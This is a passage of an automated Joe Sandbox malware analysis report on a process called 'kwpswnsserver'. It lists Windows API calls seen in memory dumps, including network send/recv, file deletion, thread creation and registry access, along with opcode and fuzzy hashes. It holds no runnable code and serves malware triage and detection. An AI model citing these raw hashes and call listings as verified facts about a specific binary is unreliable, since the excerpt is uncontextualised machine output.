                                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 04279E04
                                                                  • GdipDisposeImage.GDIPLUS(?), ref: 04279E18
                                                                  • GdipDisposeImage.GDIPLUS(?), ref: 04279E3B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                   • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                  • String ID:
                                                                  • API String ID: 800915452-0
                                                                  • Opcode ID: 3c0db494c72d94242cbc56f49476434a6e4b948bcee6d596dd09b02c791d4fc7
                                                                  • Instruction ID: a361c3b00964b3a2c9305927db3e9af0bd7b4c6edcb076b105a53e8334125cd3
                                                                  • Opcode Fuzzy Hash: 3c0db494c72d94242cbc56f49476434a6e4b948bcee6d596dd09b02c791d4fc7
                                                                  • Instruction Fuzzy Hash: 10F0A4B1B11229E78B10EF98E8488AFF7B8EB44715B00469AFC05A7340DA349F45CBE5
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0429FB64), ref: 04279ADC
                                                                  • GdiplusStartup.GDIPLUS(0429FB60,?,?), ref: 04279B15
                                                                  • LeaveCriticalSection.KERNEL32(0429FB64), ref: 04279B26
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                   • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                  • String ID:
                                                                  • API String ID: 389129658-0
                                                                  • Opcode ID: 531a824039eca36ce015a57c1265b0092b81d74ac896c480b290223968dddafc
                                                                  • Instruction ID: d5dd810cb21bce0d41b0577c1e67d9982c95315fd650fdc67a6483b2d30456e3
                                                                  • Opcode Fuzzy Hash: 531a824039eca36ce015a57c1265b0092b81d74ac896c480b290223968dddafc
                                                                  • Instruction Fuzzy Hash: 24F0C271B41309ABDF04DFD9E93A7AAB7B8F708311F100199D40492140CB761D48CBA1
                                                                  APIs
                                                                  • DeleteFileW.KERNEL32(6C9D6201,?,6C9D6201,00000007), ref: 6C9E3201
                                                                  • GetLastError.KERNEL32(?,6C9D6201,00000007), ref: 6C9E320B
                                                                  • __dosmaperr.LIBCMT ref: 6C9E3212
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteErrorFileLast__dosmaperr
                                                                  • String ID:
                                                                  • API String ID: 1545401867-0
                                                                  • Opcode ID: 817b39c03b8b657559854391f83b1273a3d71a8edade32f3451ae40cca118a0b
                                                                  • Instruction ID: 02ce25bc801171585844119b5352f3c25dffcb02db730df041f2dedaf2d47b8d
                                                                  • Opcode Fuzzy Hash: 817b39c03b8b657559854391f83b1273a3d71a8edade32f3451ae40cca118a0b
                                                                  • Instruction Fuzzy Hash: E0D0123224871A67CF142AFAEC0C41B3BACEF9277D3148721F86CC56A0EF36C4529951
                                                                  APIs
                                                                  Strings
                                                                  • Error retrieving folder path, xrefs: 6C871FE6
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: FolderPath
                                                                  • String ID: Error retrieving folder path
                                                                  • API String ID: 1514166925-3197305068
                                                                  • Opcode ID: d1278111c4dbad6d08a97d570947529046d52c20f86911989d802684027d1f34
                                                                  • Instruction ID: 1890e145d19c749d06f67596b1e637bbf1ca188e80c9c3823bd905f8d55f1b13
                                                                  • Opcode Fuzzy Hash: d1278111c4dbad6d08a97d570947529046d52c20f86911989d802684027d1f34
                                                                  • Instruction Fuzzy Hash: BA21F8B0E0430A9FCF14EFB8D5556AEBBF0FB49304F008929D449A7340E734A958CB92
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e8941cf3c2486cd920bb02f64b4be5a10d10e53152024e913bcec62e8a0a6969
                                                                  • Instruction ID: 6652962792152a43e4164896fa3d33617443c07b2e99d106b82536736ee7f18e
                                                                  • Opcode Fuzzy Hash: e8941cf3c2486cd920bb02f64b4be5a10d10e53152024e913bcec62e8a0a6969
                                                                  • Instruction Fuzzy Hash: 33D158B4A093818FD374CF69C680B9ABBE1BB99304F108D2EE99D97751D730A944CB53
                                                                  APIs
                                                                    • Part of subcall function 6C9E1CA4: GetConsoleOutputCP.KERNEL32(E343E0B4,00000000,00000000,?), ref: 6C9E1D07
                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6C9D4A95,?), ref: 6C9E1A7F
                                                                  • GetLastError.KERNEL32(?,6C9D4A95,?,6C9D4CD9,00000000,?,00000000,6C9D4CD9,?,00000000,00000000,6CA4F8C8,0000002C,6C9D4BC5,?), ref: 6C9E1A89
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                  • String ID:
                                                                  • API String ID: 2915228174-0
                                                                  • Opcode ID: 7da5aacb15726209fd54c7380641ae9b78192955a3506226568b0388b1955b1a
                                                                  • Instruction ID: 65f38b84f96b75082f1717bce0308f06927384d186f714b68b8160978ca893fc
                                                                  • Opcode Fuzzy Hash: 7da5aacb15726209fd54c7380641ae9b78192955a3506226568b0388b1955b1a
                                                                  • Instruction Fuzzy Hash: 1761A472D0411AAFDF02DFA8D884EEEBBBAAF2F308F144145E914A7656D331D905CB60
                                                                  APIs
                                                                  • __RTC_Initialize.LIBCMT ref: 6C9C1D62
                                                                    • Part of subcall function 6C9C210E: InitializeSListHead.KERNEL32(6CA5A018,6C9C1D6C,6CA4F630,00000010,6C9C1F05,?,00000000,?,00000007,6CA4F650,00000010,6C9C1F18,?,?,6C9C1FA1,?), ref: 6C9C2113
                                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6C9C1DCC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                  • String ID:
                                                                  • API String ID: 3231365870-0
                                                                  • Opcode ID: d759f6058e610f308dad9f4d22d2a40f8700f008db7ba69b95a2f64b0ead9c46
                                                                  • Instruction ID: 7053fa66321da014f5ade74ba70e058c2373cc9ec25de011ee9aab9add34a06f
                                                                  • Opcode Fuzzy Hash: d759f6058e610f308dad9f4d22d2a40f8700f008db7ba69b95a2f64b0ead9c46
                                                                  • Instruction Fuzzy Hash: FB21043270A7469EDF149FB8A9017DC3365AF1336DF10886AC545A7F80DB21C549867B
                                                                  APIs
                                                                  • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 04273043
                                                                  • recv.WS2_32(?,?,00040000,00000000), ref: 04273064
                                                                    • Part of subcall function 0427F91B: __getptd_noexit.LIBCMT ref: 0427F91B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexitrecvselect
                                                                  • String ID:
                                                                  • API String ID: 4248608111-0
                                                                  • Opcode ID: ef9f6b3aa087ed867b748e7d7ccbe9bdacf4dc8c9d440c52a011af652ff63027
                                                                  • Instruction ID: 763041fbe9608177efa489212b704cc43f8e12b213b9d00c0faab534e59953fa
                                                                  • Opcode Fuzzy Hash: ef9f6b3aa087ed867b748e7d7ccbe9bdacf4dc8c9d440c52a011af652ff63027
                                                                  • Instruction Fuzzy Hash: 9621B571714208EFEB30EF69DC89B9A77A4EF04314F1545A5E9049B290DBB0BD84DBA2
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,6C9E1A65,00000000,6C9D4CD9,?,00000000,?,00000000), ref: 6C9E216F
                                                                  • GetLastError.KERNEL32(?,6C9E1A65,00000000,6C9D4CD9,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6C9D4A95), ref: 6C9E2195
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID:
                                                                  • API String ID: 442123175-0
                                                                  • Opcode ID: a8de432f979920a4266720ac6e82cc7dac515799c73fd92c95ee30f9ab9c83a1
                                                                  • Instruction ID: bfd44f137d32c1a5d1b9a97c077220863c44def43320ece0105fa71e35bf7e13
                                                                  • Opcode Fuzzy Hash: a8de432f979920a4266720ac6e82cc7dac515799c73fd92c95ee30f9ab9c83a1
                                                                  • Instruction Fuzzy Hash: 3E21A231A0121A9BCB1ACF29CC849E9B7B6BF5D305F2441A9EA09D7611D730DF42CB61
                                                                  APIs
                                                                  • __RTC_Initialize.LIBCMT ref: 6C9C1E63
                                                                  • ___scrt_uninitialize_crt.LIBCMT ref: 6C9C1E7D
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize___scrt_uninitialize_crt
                                                                  • String ID:
                                                                  • API String ID: 2442719207-0
                                                                  • Opcode ID: 1c5a144578b33f8652799a8183273776de1117f02b1f73015a09e39344e5a049
                                                                  • Instruction ID: 7414385919d1517605d365ec1db4e73c320a0f285172d4ce04ffa4c32cf6dc1e
                                                                  • Opcode Fuzzy Hash: 1c5a144578b33f8652799a8183273776de1117f02b1f73015a09e39344e5a049
                                                                  • Instruction Fuzzy Hash: 9E21F67275A30A9ADF149FACD9003DD37A8EB13319F20852AD514D3F80DB35C6058BAB
                                                                  APIs
                                                                  • send.WS2_32(?,?,00040000,00000000), ref: 04273291
                                                                  • send.WS2_32(?,?,?,00000000), ref: 042732CE
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: send
                                                                  • String ID:
                                                                  • API String ID: 2809346765-0
                                                                  • Opcode ID: ffd06a9d82c7a084fcae035b651e81e97414b1536852fda694f1afd48efecb1a
                                                                  • Instruction ID: 06028dd33cf0c240271f2a79a1efe4233173534abcd1684fc231dac6736b873d
                                                                  • Opcode Fuzzy Hash: ffd06a9d82c7a084fcae035b651e81e97414b1536852fda694f1afd48efecb1a
                                                                  • Instruction Fuzzy Hash: 1211E172B15304BBD720CA6EDC89B9ABB98FB81364F104025EF08D7280EA71BD41E655
                                                                  APIs
                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000002,?,00000000,?,?,?,6C9DFB17,00000000,?,?,00000002,00000000), ref: 6C9DFC9B
                                                                  • GetLastError.KERNEL32(00000000,?,6C9DFB17,00000000,?,?,00000002,00000000,?,6C9E199F,?,00000000,00000000,00000002,?,?), ref: 6C9DFCA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastPointer
                                                                  • String ID:
                                                                  • API String ID: 2976181284-0
                                                                  • Opcode ID: b54dcb569206c37e8c9af2be9af1d2c9e0777c10159a4956a8adefaa35ce62d4
                                                                  • Instruction ID: 9c9e372866f4e34087f731cbe974eac2725b418b7610baab0bb0f843f383819c
                                                                  • Opcode Fuzzy Hash: b54dcb569206c37e8c9af2be9af1d2c9e0777c10159a4956a8adefaa35ce62d4
                                                                  • Instruction Fuzzy Hash: A8012B33700A55AFCB058F69DC05C9D3B69DF96368B258204FC11AB690E771E951DBD0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: SleepTimetime
                                                                  • String ID:
                                                                  • API String ID: 346578373-0
                                                                  • Opcode ID: 7fa1c7097b3c3609dac28cfcc79affbf25e35779a766d8da037f3fbdfc3c446e
                                                                  • Instruction ID: 78df89cbabb61fa49c672e4d96f30985c587e1d92faf7a477eb0ff4328b7ea03
                                                                  • Opcode Fuzzy Hash: 7fa1c7097b3c3609dac28cfcc79affbf25e35779a766d8da037f3fbdfc3c446e
                                                                  • Instruction Fuzzy Hash: 3A01DF3171020AAFD311CF28D8C8B69B7A5FB99351F144264D9049B680C735BDC6D7E2
                                                                  APIs
                                                                  • HeapCreate.KERNEL32(00000004,00000000,00000000,0427E04E,00000000,04279800,?,?,?,00000000,0429125B,000000FF,?,0427E04E), ref: 0427CD1B
                                                                  • _free.LIBCMT ref: 0427CD56
                                                                    • Part of subcall function 04271280: __CxxThrowException@8.LIBCMT ref: 04271290
                                                                    • Part of subcall function 04271280: DeleteCriticalSection.KERNEL32(00000000,0427D3E6,04296624,?,?,0427D3E6,?,?,?,?,04295A40,00000000), ref: 042712A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                  • String ID:
                                                                  • API String ID: 1116298128-0
                                                                  • Opcode ID: 858a3eceb001ecce6b35d198992977e758d21b914f3a6cc485d4b2414723a69f
                                                                  • Instruction ID: 02b8d78d7e895c4679412b62f0cb8262aa5633a7d07a494b67dbd70df84e3e24
                                                                  • Opcode Fuzzy Hash: 858a3eceb001ecce6b35d198992977e758d21b914f3a6cc485d4b2414723a69f
                                                                  • Instruction Fuzzy Hash: 0A017AB0A00B409FD3309F6A9884A07FAE8FF98700B104A1ED2DAC6A10D774A505CF65
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,0427DF10,00000000,00000000,00000000), ref: 0427E49B
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,04281168,?,?,?,?,?,?,04296298,0000000C,04281210,?), ref: 0427E4A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateObjectSingleThreadWait
                                                                  • String ID:
                                                                  • API String ID: 1891408510-0
                                                                  • Opcode ID: f384285ece3dd1646ed32a6477e17a5af7003f3afe0b402d251f7efead1b5439
                                                                  • Instruction ID: eaa35dc05969887f0b26e45f88726ecba0f8f8c9ee2f1f55d7e312c0e27fff3e
                                                                  • Opcode Fuzzy Hash: f384285ece3dd1646ed32a6477e17a5af7003f3afe0b402d251f7efead1b5439
                                                                  • Instruction Fuzzy Hash: 22E012B0B54216BFDB109A5CBC8CE3673DCD704334B104656B910D2244DD79AC708AB4
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 0427F98F
                                                                    • Part of subcall function 04283E5B: __getptd_noexit.LIBCMT ref: 04283E5E
                                                                    • Part of subcall function 04283E5B: __amsg_exit.LIBCMT ref: 04283E6B
                                                                    • Part of subcall function 0427F964: __getptd_noexit.LIBCMT ref: 0427F969
                                                                    • Part of subcall function 0427F964: __freeptd.LIBCMT ref: 0427F973
                                                                    • Part of subcall function 0427F964: ExitThread.KERNEL32 ref: 0427F97C
                                                                  • __XcptFilter.LIBCMT ref: 0427F9B0
                                                                    • Part of subcall function 0428418F: __getptd_noexit.LIBCMT ref: 04284195
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                  • String ID:
                                                                  • API String ID: 418257734-0
                                                                  • Opcode ID: db0ab7168e39f37379fed61ec1a753d28f5197527b4f66888010e20637fd783c
                                                                  • Instruction ID: 5e4131cae8d3ff017722b7c8cc3da8861a69b4ff7b04b7169eb074e9a00c5ad7
                                                                  • Opcode Fuzzy Hash: db0ab7168e39f37379fed61ec1a753d28f5197527b4f66888010e20637fd783c
                                                                  • Instruction Fuzzy Hash: 7AE0ECB1A25601EFEB18FBA0D905E7D7775AF44A09F20014CE1016B2A1DB75B940DA20
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 0428641B
                                                                    • Part of subcall function 04288E5B: __mtinitlocknum.LIBCMT ref: 04288E71
                                                                    • Part of subcall function 04288E5B: __amsg_exit.LIBCMT ref: 04288E7D
                                                                    • Part of subcall function 04288E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,04283F06,0000000D,04296340,00000008,04283FFF,00000000,?,042810F0,00000000,04296278,00000008,04281155,?), ref: 04288E85
                                                                  • __tzset_nolock.LIBCMT ref: 0428642C
                                                                    • Part of subcall function 04285D22: __lock.LIBCMT ref: 04285D44
                                                                    • Part of subcall function 04285D22: ____lc_codepage_func.LIBCMT ref: 04285D8B
                                                                    • Part of subcall function 04285D22: __getenv_helper_nolock.LIBCMT ref: 04285DAD
                                                                    • Part of subcall function 04285D22: _free.LIBCMT ref: 04285DE4
                                                                    • Part of subcall function 04285D22: _strlen.LIBCMT ref: 04285DEB
                                                                    • Part of subcall function 04285D22: __malloc_crt.LIBCMT ref: 04285DF2
                                                                    • Part of subcall function 04285D22: _strlen.LIBCMT ref: 04285E08
                                                                    • Part of subcall function 04285D22: _strcpy_s.LIBCMT ref: 04285E16
                                                                    • Part of subcall function 04285D22: __invoke_watson.LIBCMT ref: 04285E2B
                                                                    • Part of subcall function 04285D22: _free.LIBCMT ref: 04285E3A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                  • String ID:
                                                                  • API String ID: 1828324828-0
                                                                  • Opcode ID: 1605aab424bbb690b0a3b7ccff6761b58a7ccec011e3ce231b6b0c3a90a0a936
                                                                  • Instruction ID: fbf772429cbb27773036e322e9f899186e29b8b8e3504d62b5be304e95a28504
                                                                  • Opcode Fuzzy Hash: 1605aab424bbb690b0a3b7ccff6761b58a7ccec011e3ce231b6b0c3a90a0a936
                                                                  • Instruction Fuzzy Hash: BEE01231F63711D7EB367FE4B606A0CF2A0AB94F29F64821DE950214C0EA743951C652
                                                                  APIs
                                                                  • RegCloseKey.ADVAPI32(80000001,04276E9A), ref: 04276EC9
                                                                  • RegCloseKey.ADVAPI32(75BF73E0), ref: 04276ED2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 3264d68bae967dd69a8002d5f4c9ec9332c1450fb4bc36337256042731cd91f7
                                                                  • Instruction ID: 59c94d18a7094f45f65da7b2f7d844eff3580607b31b106f309fe6ecd8c8cfe3
                                                                  • Opcode Fuzzy Hash: 3264d68bae967dd69a8002d5f4c9ec9332c1450fb4bc36337256042731cd91f7
                                                                  • Instruction Fuzzy Hash: 05C09B72D01038B7CF10E7A8FD4894D77B89F4C110F1144C2A104A3114C634BD41CF90
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,6C9E15BF,6C9E8E21,?,00000000,00000000), ref: 6C9E1626
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,6C9E8E21), ref: 6C9E1630
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
